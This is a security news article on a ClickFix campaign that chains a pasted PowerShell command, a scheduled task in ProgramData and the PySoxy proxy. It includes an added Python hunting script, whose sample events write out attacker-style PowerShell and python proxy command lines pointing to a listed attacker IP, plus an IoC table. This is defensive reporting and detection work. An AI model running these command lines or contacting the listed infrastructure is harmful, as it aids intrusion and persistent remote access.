ClickFix Evolves with 10-Year-Old Open-Source Python SOCKS5 Proxy
Cyber Security News
By Tushar Subhra Dutta
May 13, 2026
A cyberattack campaign that tricks users into running malicious commands on their own computers has taken a dangerous new turn. The technique, known as “ClickFix,” has been circulating for some time, but a recent incident revealed that attackers are now pairing it with a 10-year-old open-source Python tool to create a far more resilient form of access.
What was once treated as a simple user mistake is now evolving into a complex multi-layered intrusion that can survive even after security tools step in to block it.
The attack begins when a user visits a compromised website that presents a fake prompt, convincing the visitor to paste and run a PowerShell command on their own machine. This well-known social engineering trick has been used in many previous campaigns.
What makes this version different is what happens after that single command runs. Rather than stopping at one callback, the intrusion sets up automated access that continues long after the initial click.
Security researchers at ReliaQuest identified this updated campaign in April 2026, noting that it marked the first observed case where ClickFix execution was combined with PySoxy, a Python-based SOCKS5 proxy tool originally published roughly a decade ago.
The analysts described the result as a “durable access chain,” one that continued re-executing even after outbound connections were blocked by security controls. That detail alone signals a meaningful shift in how this threat behaves.
ClickFix Deploys PySoxy
The central lesson here is one that defenders often overlook: blocking an attacker’s connection does not mean the attack is over. In the incident studied, both of the attacker’s access channels were cut off by endpoint controls, yet a scheduled task already on the affected machine kept attempting to relaunch the malicious script for hours.
This persistence mechanism transformed a single user mistake into an ongoing compromise. Ransomware affiliates may eventually begin treating ClickFix as a primary entry point alongside other established access methods.
The operational similarities between this chain and SocGholish intrusions, which also rely on social engineering before moving into reconnaissance and proxy-based access, suggest ClickFix is maturing into a serious pre-ransomware delivery platform.
Once the initial PowerShell command ran, the attacker moved quickly to build a deeper foothold. A scheduled task was planted that relaunched a staged script from the C:\ProgramData folder roughly every 40 minutes. That script functioned as a lightweight remote access tool, polling the attacker’s server every three seconds, executing commands on the host, and sending back results.
After establishing this PowerShell-based access, the attacker moved into reconnaissance. Built-in Windows tools were used to enumerate group memberships, identify domain controllers, and map other machines on the network. Only after confirming that a staging server could be reached did the attacker introduce PySoxy, downloading compiled Python bytecode and running it with proxy arguments pointing to a separate external IP address.
PySoxy gave the attacker a second, independent route back into the host. This second channel used different infrastructure and a different traffic pattern than the first, meaning that a complete shutdown of the PowerShell C2 connection would still leave this second door open. The attacker had built two separate access paths into the same environment.
Why a Blocked Callback Is Not Enough
The most important takeaway from this campaign is that containment requires more than blocking a single connection. Analysts recommend fully isolating the affected host and reviewing all scheduled tasks, particularly those created shortly after suspicious PowerShell activity. Any tasks pointing to scripts in non-standard directories like ProgramData should be treated as high-priority findings.
Incident responders should look for Python execution tied to proxy-style command-line arguments, specifically flags like -ssl, -remote_ip, and -remote_port, as well as compiled .pyc files in unexpected locations. Removing staged scripts, Python runtimes, and bytecode files is just as critical as blocking the network connection, because any leftover component can restart the chain. Treating a ClickFix incident as a potential full compromise rather than an isolated user error is now the only appropriate response.
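The access chain described above (a scheduled task relaunching a staged script from ProgramData, Python started with proxy-style arguments, stray .pyc files, and callbacks to the listed infrastructure) maps directly onto the hunt steps the article recommends. The following is an added example, not code from the article or from ReliaQuest: it runs those checks over a handful of constructed event records. The event format, the 30-minute "shortly after PowerShell" window, the list of non-standard script directories, and the rule for what counts as an unexpected .pyc location are all assumptions made for the example; the IoC values are the defanged ones from the table above, re-fanged only in memory for offline matching.

```python
"""Hunt checks for a ClickFix/PySoxy-style chain over constructed Windows events.

Added example; assumes a simplified event model (timestamp, kind, detail) such as
one might build from Security 4698 task-creation, Sysmon process/file events and
proxy logs. Thresholds and directory lists are illustrative assumptions.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta

# Defanged IoCs from the article's table; re-fanged only inside this process.
DEFANGED_IOCS = {
    "185.205.211[.]217": "ClickFix Infrastructure IP",
    "206.206.103[.]120": "PowerShell RAT C2",
    "206.206.103[.]106": "Staging and Exfiltration IP",
    "167.99.158[.]97": "PySoxy Proxy Destination IP",
    "strapness[.]com": "ClickFix Stager Domain",
    "abledom[.]net": "Secondary C2 Domain",
    "overlateise[.]com": "Hosted the ClickFix script",
}


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into a matchable value (never for display)."""
    return ioc.replace("[.]", ".")


IOCS = {refang(k): v for k, v in DEFANGED_IOCS.items()}

# Proxy-style flags the article calls out for PySoxy executions.
PROXY_FLAGS = {"-ssl", "-remote_ip", "-remote_port"}
# Assumed set of directories where a scheduled-task script should not live.
NONSTANDARD_DIRS = ("c:\\programdata", "c:\\users\\public", "c:\\windows\\temp")
SCRIPT_EXTS = (".ps1", ".bat", ".cmd", ".vbs", ".js", ".pyc")


@dataclass
class Event:
    ts: datetime
    kind: str    # "process" (command line), "task" (action path), "file" (path), "net" (destination)
    detail: str


def is_nonstandard_script(path: str) -> bool:
    p = path.strip('"').lower()
    return p.startswith(NONSTANDARD_DIRS) and p.endswith(SCRIPT_EXTS)


def is_unexpected_pyc(path: str) -> bool:
    # Heuristic assumption: legitimate bytecode sits in __pycache__ or under a Python install.
    p = path.lower()
    return p.endswith(".pyc") and "__pycache__" not in p and "\\python" not in p


def hunt(events, window=timedelta(minutes=30)):
    """Return (rule, detail) findings for the four artefact classes from the article."""
    findings = []
    ps_times = [e.ts for e in events if e.kind == "process" and "powershell" in e.detail.lower()]
    for e in events:
        low = e.detail.lower()
        if e.kind == "task" and is_nonstandard_script(e.detail):
            # Scheduled task pointing into ProgramData, created shortly after PowerShell ran.
            if any(timedelta(0) <= (e.ts - t) <= window for t in ps_times):
                findings.append(("scheduled_task_nonstandard_dir", e.detail))
        elif e.kind == "process" and "python" in low:
            if PROXY_FLAGS & set(low.split()):
                findings.append(("python_proxy_args", e.detail))
        elif e.kind == "file" and is_unexpected_pyc(e.detail):
            findings.append(("pyc_unexpected_location", e.detail))
        elif e.kind == "net" and e.detail in IOCS:
            findings.append(("ioc_match", f"{e.detail} ({IOCS[e.detail]})"))
    return findings


# Constructed sample telemetry (not from the incident) following the article's chain.
T0 = datetime(2026, 4, 10, 9, 0, 0)
SAMPLE_EVENTS = [
    Event(T0, "process", 'powershell.exe -NoProfile -w hidden -File "C:\\ProgramData\\stage.ps1"'),
    Event(T0 + timedelta(minutes=2), "task", "C:\\ProgramData\\stage.ps1"),
    Event(T0 + timedelta(minutes=5), "process", "C:\\Windows\\System32\\whoami.exe /groups"),
    Event(T0 + timedelta(minutes=40), "process",
          "python.exe C:\\ProgramData\\p.pyc -ssl -remote_ip 167.99.158.97 -remote_port 443"),
    Event(T0 + timedelta(minutes=40), "file", "C:\\ProgramData\\p.pyc"),
    Event(T0 + timedelta(minutes=41), "net", "167.99.158.97"),
    Event(T0 + timedelta(minutes=60), "task", "C:\\Program Files\\Vendor\\updater.exe"),
    Event(T0 + timedelta(minutes=61), "file", "C:\\Python311\\Lib\\__pycache__\\os.cpython-311.pyc"),
    Event(T0 + timedelta(minutes=62), "net", "10.0.0.5"),
]

if __name__ == "__main__":
    for rule, detail in hunt(SAMPLE_EVENTS):
        print(f"{rule:32} {detail}")
```

Against the constructed events the script reports exactly the four artefacts the article says responders must remove together: the task in ProgramData, the Python proxy execution, the stray bytecode file, and the callback to the PySoxy destination; the benign task, the interpreter's own .pyc and the internal connection produce nothing. The point of keeping all four rules in one pass is the article's own: clearing only the network indicator leaves the task and the bytecode in place to restart the chain.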
Indicators of Compromise (IoCs):

Type        Indicator            Description
IP Address  185.205.211[.]217    ClickFix Infrastructure IP
IP Address  206.206.103[.]120    PowerShell RAT C2
IP Address  206.206.103[.]106    Staging and Exfiltration IP
IP Address  167.99.158[.]97      PySoxy Proxy Destination IP
Domain      strapness[.]com      ClickFix Stager Domain
Domain      abledom[.]net        Secondary C2 Domain
Domain      overlateise[.]com    Hosted the ClickFix script (/api/jquery[.]js) injected into the compromised site
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.